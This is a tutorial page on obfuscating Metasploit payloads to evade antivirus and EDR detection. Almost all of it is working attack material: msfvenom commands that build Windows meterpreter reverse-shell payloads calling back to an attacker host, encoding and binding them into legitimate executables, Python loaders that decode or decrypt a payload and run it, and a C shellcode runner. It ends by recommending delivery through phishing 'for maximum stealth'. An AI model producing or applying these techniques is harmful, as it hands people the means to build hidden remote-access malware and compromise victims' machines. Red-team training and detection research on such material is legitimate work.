11. Metasploit Obfuscating Payloads

Obfuscating payloads is a critical step to evade antivirus (AV), endpoint detection, and response (EDR) systems. Techniques range from basic, intermediate, and advanced obfuscation techniques for payloads.

1. Basics: Encoding Payloads with msfvenom¶

Encoding alters the payload structure without changing its behavior.

Using `msfvenom` Encoders¶

Generate an Encoded Payload:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded_payload.exe
```
- -e x86/shikata_ga_nai: Specifies the encoder (Shikata Ga Nai).
- -i 3: Number of encoding iterations.
- -f exe: Specifies the output format.
- -o: Specifies the output file.
- Test Compatibility: Use:
```
msfvenom --list encoders
```
Choose an encoder compatible with your payload and target system.

2. Intermediate: Leveraging Obfuscation Frameworks¶

Veil Framework¶

Veil evades detection by encoding or wrapping payloads in benign-looking files.

Install Veil:
```
sudo apt update
sudo apt install veil
```
Run Veil:
```
veil
```
Generate a Payload:
- Choose a payload type (e.g., python/meterpreter/reverse_tcp).
- Set LHOST and LPORT.
- Generate the payload and output a file (e.g., payload.py).
- Execute the Obfuscated Payload: Transfer and execute the file on the target system.

Using msfvenom and Custom Wrappers¶

Wrap a payload inside another executable to hide its intent:

Generate the payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o reverse.exe

Bind it to a legitimate application:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -x legit_app.exe -k -f exe -o bound_payload.exe
```
- -x legit_app.exe: Wrap payload with a benign executable.
- -k: Retain the original functionality of the legitimate application.

3. Advanced: Custom Obfuscation Techniques¶

Custom Encoding with Python¶

Generate Raw Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o payload.raw

Base64 Encode the Payload:

cat payload.raw | base64 > encoded_payload.b64

Create a Python Loader:

import base64
import os

encoded_payload = "BASE64_ENCODED_STRING_HERE"

payload = base64.b64decode(encoded_payload)
with open("malicious.exe", "wb") as f:
    f.write(payload)

os.system("malicious.exe")

Replace BASE64_ENCODED_STRING_HERE with the contents of encoded_payload.b64.

Compile with pyinstaller to create an executable:

pyinstaller --onefile --noconsole loader.py

Using Encryption for Obfuscation¶

Encrypt the payload and decrypt it during execution.

Encrypt the Payload:

Generate a payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o payload.raw

Encrypt with OpenSSL:

openssl enc -aes-256-cbc -salt -in payload.raw -out payload.enc -pass pass:SECRET_KEY

Create a Decryptor:

Write a decryptor in Python:

from Crypto.Cipher import AES
import os

key = b"YOUR_SECRET_KEY_HERE"
iv = b"16_BYTE_INIT_VEC"
encrypted_payload = b"ENCRYPTED_PAYLOAD_HERE"

cipher = AES.new(key, AES.MODE_CBC, iv)
payload = cipher.decrypt(encrypted_payload)

with open("decrypted_payload.exe", "wb") as f:
    f.write(payload)

os.system("decrypted_payload.exe")

Replace placeholders with actual values and compile with pyinstaller.

Custom Shellcode Loader¶

Use a programming language like C to obfuscate and execute shellcode directly.

Generate Shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f c

Create a C Program:

#include <stdio.h>
#include <windows.h>

unsigned char shellcode[] = "SHELLCODE_HERE";

int main() {
    void (*exec_shellcode)();
    exec_shellcode = (void (*)())shellcode;
    exec_shellcode();
    return 0;
}

**Replace SHELLCODE_HERE with the output of msfvenom.

Compile:

x86_64-w64-mingw32-gcc loader.c -o loader.exe

4. Combining Obfuscation Techniques¶

For maximum stealth:

Encode the payload with Shikata Ga Nai.
Wrap it in a benign application with -x.
Encrypt the payload and create a custom loader.
Distribute using social engineering techniques (e.g., phishing).